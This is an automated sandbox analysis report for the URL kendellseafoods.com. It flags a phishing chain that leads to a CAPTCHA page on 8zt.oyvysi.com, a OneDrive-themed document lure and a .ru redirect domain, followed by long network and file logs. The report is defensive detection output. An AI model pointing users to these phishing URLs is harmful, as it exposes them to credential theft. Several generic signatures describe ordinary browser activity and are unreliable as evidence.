Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://kendellseafoods.com/

Overview

General Information

Sample URL:http://kendellseafoods.com/
Analysis ID:1528309
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
Phishing site detected (based on shot match)
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Drops PE files
Drops PE files to the windows directory (C:\Windows)
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1964,i,16778189248454906919,2977420556437404773,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://kendellseafoods.com/" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://8zt.oyvysi.com/h2b7AtfcCPBLraDgEbdA/Matcher: Template: captcha matched
Source: https://8zt.oyvysi.com/h2b7AtfcCPBLraDgEbdA/Matcher: Template: captcha matched
Source: Chrome DOM: 0.0OCR Text: OneDrive for Business REVIEW DOCUMENT HERE
Source: https://www.acentdistributing.com/HTTP Parser: Base64 decoded: AIzaSyCBTROq6LuvF_IE1r46-T4AeTSV-0d7my8
Source: https://8zt.oyvysi.com/h2b7AtfcCPBLraDgEbdA/HTTP Parser: No favicon
Source: https://8zt.oyvysi.com/h2b7AtfcCPBLraDgEbdA/HTTP Parser: No favicon
Source: https://www.made-in-china.com/HTTP Parser: No favicon
Source: https://www.made-in-china.com/HTTP Parser: No favicon
Source: https://www.made-in-china.com/HTTP Parser: No favicon
Source: https://www.made-in-china.com/HTTP Parser: No favicon
Source: https://www.made-in-china.com/HTTP Parser: No favicon
Source: https://www.made-in-china.com/HTTP Parser: No favicon
Source: https://www.made-in-china.com/HTTP Parser: No favicon
Source: https://www.made-in-china.com/HTTP Parser: No favicon
Source: https://www.made-in-china.com/HTTP Parser: No favicon
Source: https://www.made-in-china.com/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49768 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49787 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:50042 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.31.71:443 -> 192.168.2.17:63903 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.185:443 -> 192.168.2.17:63906 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.17:63892 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:63892 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:63892 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:63892 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:63892 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:63892 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:63892 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:63892 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: global trafficDNS traffic detected: DNS query: kendellseafoods.com
Source: global trafficDNS traffic detected: DNS query: www.acentdistributing.com
Source: global trafficDNS traffic detected: DNS query: use.typekit.net
Source: global trafficDNS traffic detected: DNS query: images.squarespace-cdn.com
Source: global trafficDNS traffic detected: DNS query: assets.squarespace.com
Source: global trafficDNS traffic detected: DNS query: static1.squarespace.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: p.typekit.net
Source: global trafficDNS traffic detected: DNS query: 8zt.oyvysi.com
Source: global trafficDNS traffic detected: DNS query: performance.squarespace.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: giwmkckv2mhdmprzl27w7sl809sj3oulafvkxoj4fpz5w94cnsyngv.tubeawelm.ru
Source: global trafficDNS traffic detected: DNS query: made-in-china.com
Source: global trafficDNS traffic detected: DNS query: www.made-in-china.com
Source: global trafficDNS traffic detected: DNS query: www.micstatic.com
Source: global trafficDNS traffic detected: DNS query: image.made-in-china.com
Source: global trafficDNS traffic detected: DNS query: pic.made-in-china.com
Source: global trafficDNS traffic detected: DNS query: static.cloudflareinsights.com
Source: global trafficDNS traffic detected: DNS query: discovery.micstatic.com
Source: global trafficDNS traffic detected: DNS query: fa.micstatic.com
Source: global trafficDNS traffic detected: DNS query: widget.usersnap.com
Source: global trafficDNS traffic detected: DNS query: resources.usersnap.com
Source: global trafficDNS traffic detected: DNS query: membercenter.made-in-china.com
Source: global trafficDNS traffic detected: DNS query: webim.trademessenger.com
Source: global trafficDNS traffic detected: DNS query: webim.made-in-china.com
Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
Source: global trafficDNS traffic detected: DNS query: tags.creativecdn.com
Source: global trafficDNS traffic detected: DNS query: asia.creativecdn.com
Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: analytics.google.com
Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: www.facebook.com
Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
Source: global trafficDNS traffic detected: DNS query: f.creativecdn.com
Source: global trafficDNS traffic detected: DNS query: login.made-in-china.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63903
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63918
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63897
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63918 -> 443
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49768 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49787 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:50042 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.31.71:443 -> 192.168.2.17:63903 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.185:443 -> 192.168.2.17:63906 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1102763635
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1102763635\sets.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1102763635\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1102763635\LICENSE
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1102763635\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1102763635\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1102763635\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_590986451
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_590986451\Google.Widevine.CDM.dll
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_590986451\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_590986451\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_590986451\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_590986451\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1130179303
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1130179303\download_file_types.pb
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1130179303\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1130179303\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1130179303\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_1130179303\manifest.fingerprint
